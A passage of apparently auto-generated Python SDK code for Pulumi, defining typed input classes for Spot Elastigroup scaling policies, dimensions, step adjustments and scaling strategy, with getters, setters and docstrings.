def target(self) -> Optional[pulumi.Input[str]]:
"""
The target number of instances to have in the group.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@property
@pulumi.getter
def threshold(self) -> Optional[pulumi.Input[float]]:
"""
The value against which the specified statistic is compared in order to determine if a step should be applied.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter
def unit(self) -> Optional[pulumi.Input[str]]:
"""
The unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unit", value)
@pulumi.input_type
class ElastigroupScalingDownPolicyDimensionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[str] value: The dimension value.
"""
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The dimension value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupScalingDownPolicyStepAdjustmentArgs:
def __init__(__self__, *,
action: pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentActionArgs'],
threshold: pulumi.Input[int]):
"""
:param pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentActionArgs'] action: Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
:param pulumi.Input[int] threshold: The value against which the specified statistic is compared. If a `step_adjustment` object is defined, then it cannot be specified.
"""
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "threshold", threshold)
@property
@pulumi.getter
def action(self) -> pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentActionArgs']:
"""
Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['ElastigroupScalingDownPolicyStepAdjustmentActionArgs']):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[int]:
"""
The value against which the specified statistic is compared. If a `step_adjustment` object is defined, then it cannot be specified.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[int]):
pulumi.set(self, "threshold", value)
@pulumi.input_type
class ElastigroupScalingDownPolicyStepAdjustmentActionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
adjustment: Optional[pulumi.Input[str]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] type: String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
:param pulumi.Input[str] adjustment: The number of instances to add or remove.
:param pulumi.Input[str] max_target_capacity: The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
:param pulumi.Input[str] maximum: The upper limit number of instances that you can scale up to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"minimum"` are not defined.
:param pulumi.Input[str] min_target_capacity: The desired target capacity of a group. Required if using `"setMinTarget"` as action type
:param pulumi.Input[str] minimum: The lower limit number of instances that you can scale down to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"maximum"` are not defined.
:param pulumi.Input[str] target: The desired number of instances. Required if using `"updateCapacity"` as action type and neither `"minimum"` nor `"maximum"` are not defined.
"""
pulumi.set(__self__, "type", type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add or remove.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The upper limit number of instances that you can scale up to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"minimum"` are not defined.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired target capacity of a group. Required if using `"setMinTarget"` as action type
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
"""
The lower limit number of instances that you can scale down to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"maximum"` are not defined.
"""
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
The desired number of instances. Required if using `"updateCapacity"` as action type and neither `"minimum"` nor `"maximum"` are not defined.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@pulumi.input_type
class ElastigroupScalingStrategyArgs:
def __init__(__self__, *,
terminate_at_end_of_billing_hour: Optional[pulumi.Input[bool]] = None,
termination_policy: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[bool] terminate_at_end_of_billing_hour: Specify whether to terminate instances at the end of each billing hour.
:param pulumi.Input[str] termination_policy: - Determines whether to terminate the newest instances when performing a scaling action. Valid values: `"default"`, `"newestInstance"`.
"""
if terminate_at_end_of_billing_hour is not None:
pulumi.set(__self__, "terminate_at_end_of_billing_hour", terminate_at_end_of_billing_hour)
if termination_policy is not None:
pulumi.set(__self__, "termination_policy", termination_policy)
@property
@pulumi.getter(name="terminateAtEndOfBillingHour")
def terminate_at_end_of_billing_hour(self) -> Optional[pulumi.Input[bool]]:
"""
Specify whether to terminate instances at the end of each billing hour.
"""
return pulumi.get(self, "terminate_at_end_of_billing_hour")
@terminate_at_end_of_billing_hour.setter
def terminate_at_end_of_billing_hour(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "terminate_at_end_of_billing_hour", value)
@property
@pulumi.getter(name="terminationPolicy")
def termination_policy(self) -> Optional[pulumi.Input[str]]:
"""
- Determines whether to terminate the newest instances when performing a scaling action. Valid values: `"default"`, `"newestInstance"`.
"""
return pulumi.get(self, "termination_policy")
@termination_policy.setter
def termination_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "termination_policy", value)
@pulumi.input_type
class ElastigroupScalingTargetPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
target: pulumi.Input[float],
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingTargetPolicyDimensionArgs']]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_capacity_per_scale: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
predictive_mode: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
statistic: Optional[pulumi.Input[str]] = None,
unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: String, the name of the metric, with or without spaces.
:param pulumi.Input[str] namespace: String, the namespace for the alarm's associated metric.
:param pulumi.Input[str] policy_name: String, the name of the policy.
:param pulumi.Input[float] target: The target number of instances to have in the group.
:param pulumi.Input[int] cooldown: Integer the amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingTargetPolicyDimensionArgs']]] dimensions: A list of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
:param pulumi.Input[str] max_capacity_per_scale: String, restrict the maximal number of instances which can be added in each scale-up action.
:param pulumi.Input[int] period: The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
:param pulumi.Input[str] predictive_mode: Start a metric prediction process to determine the expected target metric value within the next two days. See [Predictive Autoscaling](https://api.spotinst.com/elastigroup-for-aws/concepts/scaling-concepts/predictive-autoscaling/) documentation for more info. Valid values: `FORECAST_AND_SCALE`, `FORECAST_ONLY`.
:param pulumi.Input[str] source: String, the source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
:param pulumi.Input[str] statistic: String, the metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
:param pulumi.Input[str] unit: String, tThe unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
pulumi.set(__self__, "target", target)
if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_capacity_per_scale is not None:
pulumi.set(__self__, "max_capacity_per_scale", max_capacity_per_scale)
if period is not None:
pulumi.set(__self__, "period", period)
if predictive_mode is not None:
pulumi.set(__self__, "predictive_mode", predictive_mode)
if source is not None:
pulumi.set(__self__, "source", source)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if unit is not None:
pulumi.set(__self__, "unit", unit)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
String, the name of the metric, with or without spaces.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
String, the namespace for the alarm's associated metric.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
String, the name of the policy.
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter
def target(self) -> pulumi.Input[float]:
"""
The target number of instances to have in the group.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: pulumi.Input[float]):
pulumi.set(self, "target", value)
@property
@pulumi.getter
def cooldown(self) -> Optional[pulumi.Input[int]]:
"""
Integer the amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
"""
return pulumi.get(self, "cooldown")
@cooldown.setter
def cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cooldown", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingTargetPolicyDimensionArgs']]]]:
"""
A list of dimensions describing qualities of the metric.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingTargetPolicyDimensionArgs']]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
How many evaluation periods should accumulate before a scale down action takes place.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxCapacityPerScale")
def max_capacity_per_scale(self) -> Optional[pulumi.Input[str]]:
"""
String, restrict the maximal number of instances which can be added in each scale-up action.
"""
return pulumi.get(self, "max_capacity_per_scale")
@max_capacity_per_scale.setter
def max_capacity_per_scale(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_capacity_per_scale", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter(name="predictiveMode")
def predictive_mode(self) -> Optional[pulumi.Input[str]]:
"""
Start a metric prediction process to determine the expected target metric value within the next two days. See [Predictive Autoscaling](https://api.spotinst.com/elastigroup-for-aws/concepts/scaling-concepts/predictive-autoscaling/) documentation for more info. Valid values: `FORECAST_AND_SCALE`, `FORECAST_ONLY`.
"""
return pulumi.get(self, "predictive_mode")
@predictive_mode.setter
def predictive_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "predictive_mode", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
String, the source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
String, the metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter
def unit(self) -> Optional[pulumi.Input[str]]:
"""
String, tThe unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unit", value)
@pulumi.input_type
class ElastigroupScalingTargetPolicyDimensionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[str] value: The dimension value.
"""
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The dimension value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupScalingUpPolicyArgs:
def __init__(__self__, *,
metric_name: pulumi.Input[str],
namespace: pulumi.Input[str],
policy_name: pulumi.Input[str],
action_type: Optional[pulumi.Input[str]] = None,
adjustment: Optional[pulumi.Input[str]] = None,
cooldown: Optional[pulumi.Input[int]] = None,
dimensions: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyDimensionArgs']]]] = None,
evaluation_periods: Optional[pulumi.Input[int]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
source: Optional[pulumi.Input[str]] = None,
statistic: Optional[pulumi.Input[str]] = None,
step_adjustments: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentArgs']]]] = None,
target: Optional[pulumi.Input[str]] = None,
threshold: Optional[pulumi.Input[float]] = None,
unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] metric_name: The name of the metric, with or without spaces.
:param pulumi.Input[str] namespace: The namespace for the alarm's associated metric.
:param pulumi.Input[str] policy_name: The name of the policy.
:param pulumi.Input[str] action_type: The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`. If a `step_adjustment` object is defined, then it cannot be specified.
:param pulumi.Input[str] adjustment: The number of instances to add/remove to/from the target capacity when scale is needed. Can be used as advanced expression for scaling of instances to add/remove to/from the target capacity when scale is needed. You can see more information here: Advanced expression. Example value: `"MAX(currCapacity / 5, value * 10)"`
:param pulumi.Input[int] cooldown: The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyDimensionArgs']]] dimensions: A list of dimensions describing qualities of the metric.
:param pulumi.Input[int] evaluation_periods: The number of periods over which data is compared to the specified threshold.
:param pulumi.Input[bool] is_enabled: Specifies whether the scaling policy described in this block is enabled.
:param pulumi.Input[str] max_target_capacity: The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
:param pulumi.Input[str] maximum: The maximal number of instances to have in the group.
:param pulumi.Input[str] min_target_capacity: . The number of the desired target (and minimum) capacity
:param pulumi.Input[str] minimum: The minimal number of instances to have in the group.
:param pulumi.Input[str] operator: The operator to use in order to determine if the scaling policy is applicable. Valid values: `"gt"`, `"gte"`, `"lt"`, `"lte"`.
:param pulumi.Input[int] period: The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
:param pulumi.Input[str] source: The source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
:param pulumi.Input[str] statistic: The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
:param pulumi.Input[str] target: The target number of instances to have in the group.
:param pulumi.Input[float] threshold: The value against which the specified statistic is compared in order to determine if a step should be applied.
:param pulumi.Input[str] unit: The unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
pulumi.set(__self__, "metric_name", metric_name)
pulumi.set(__self__, "namespace", namespace)
pulumi.set(__self__, "policy_name", policy_name)
if action_type is not None:
pulumi.set(__self__, "action_type", action_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if cooldown is not None:
pulumi.set(__self__, "cooldown", cooldown)
if dimensions is not None:
pulumi.set(__self__, "dimensions", dimensions)
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if period is not None:
pulumi.set(__self__, "period", period)
if source is not None:
pulumi.set(__self__, "source", source)
if statistic is not None:
pulumi.set(__self__, "statistic", statistic)
if step_adjustments is not None:
pulumi.set(__self__, "step_adjustments", step_adjustments)
if target is not None:
pulumi.set(__self__, "target", target)
if threshold is not None:
pulumi.set(__self__, "threshold", threshold)
if unit is not None:
pulumi.set(__self__, "unit", unit)
@property
@pulumi.getter(name="metricName")
def metric_name(self) -> pulumi.Input[str]:
"""
The name of the metric, with or without spaces.
"""
return pulumi.get(self, "metric_name")
@metric_name.setter
def metric_name(self, value: pulumi.Input[str]):
pulumi.set(self, "metric_name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
The namespace for the alarm's associated metric.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="policyName")
def policy_name(self) -> pulumi.Input[str]:
"""
The name of the policy.
"""
return pulumi.get(self, "policy_name")
@policy_name.setter
def policy_name(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_name", value)
@property
@pulumi.getter(name="actionType")
def action_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of action to perform for scaling. Valid values: `"adjustment"`, `"percentageAdjustment"`, `"setMaxTarget"`, `"setMinTarget"`, `"updateCapacity"`. If a `step_adjustment` object is defined, then it cannot be specified.
"""
return pulumi.get(self, "action_type")
@action_type.setter
def action_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add/remove to/from the target capacity when scale is needed. Can be used as advanced expression for scaling of instances to add/remove to/from the target capacity when scale is needed. You can see more information here: Advanced expression. Example value: `"MAX(currCapacity / 5, value * 10)"`
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter
def cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes and before the next scaling activity can start. If this parameter is not specified, the default cooldown period for the group applies.
"""
return pulumi.get(self, "cooldown")
@cooldown.setter
def cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cooldown", value)
@property
@pulumi.getter
def dimensions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyDimensionArgs']]]]:
"""
A list of dimensions describing qualities of the metric.
"""
return pulumi.get(self, "dimensions")
@dimensions.setter
def dimensions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyDimensionArgs']]]]):
pulumi.set(self, "dimensions", value)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
The number of periods over which data is compared to the specified threshold.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the scaling policy described in this block is enabled.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The maximal number of instances to have in the group.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
. The number of the desired target (and minimum) capacity
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
"""
The minimal number of instances to have in the group.
"""
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input[str]]:
"""
The operator to use in order to determine if the scaling policy is applicable. Valid values: `"gt"`, `"gte"`, `"lt"`, `"lte"`.
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The granularity, in seconds, of the returned datapoints. Period must be at least 60 seconds and must be a multiple of 60.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The source of the metric. Valid values: `"cloudWatch"`, `"spectrum"`.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def statistic(self) -> Optional[pulumi.Input[str]]:
"""
The metric statistics to return. For information about specific statistics go to [Statistics](http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/index.html?CHAP_TerminologyandKeyConcepts.html#Statistic) in the Amazon CloudWatch Developer Guide.
"""
return pulumi.get(self, "statistic")
@statistic.setter
def statistic(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statistic", value)
@property
@pulumi.getter(name="stepAdjustments")
def step_adjustments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentArgs']]]]:
return pulumi.get(self, "step_adjustments")
@step_adjustments.setter
def step_adjustments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentArgs']]]]):
pulumi.set(self, "step_adjustments", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
The target number of instances to have in the group.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@property
@pulumi.getter
def threshold(self) -> Optional[pulumi.Input[float]]:
"""
The value against which the specified statistic is compared in order to determine if a step should be applied.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "threshold", value)
@property
@pulumi.getter
def unit(self) -> Optional[pulumi.Input[str]]:
"""
The unit for the alarm's associated metric. Valid values: `"percent`, `"seconds"`, `"microseconds"`, `"milliseconds"`, `"bytes"`, `"kilobytes"`, `"megabytes"`, `"gigabytes"`, `"terabytes"`, `"bits"`, `"kilobits"`, `"megabits"`, `"gigabits"`, `"terabits"`, `"count"`, `"bytes/second"`, `"kilobytes/second"`, `"megabytes/second"`, `"gigabytes/second"`, `"terabytes/second"`, `"bits/second"`, `"kilobits/second"`, `"megabits/second"`, `"gigabits/second"`, `"terabits/second"`, `"count/second"`, `"none"`.
"""
return pulumi.get(self, "unit")
@unit.setter
def unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unit", value)
@pulumi.input_type
class ElastigroupScalingUpPolicyDimensionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
value: Optional[pulumi.Input[str]] = None):
"""
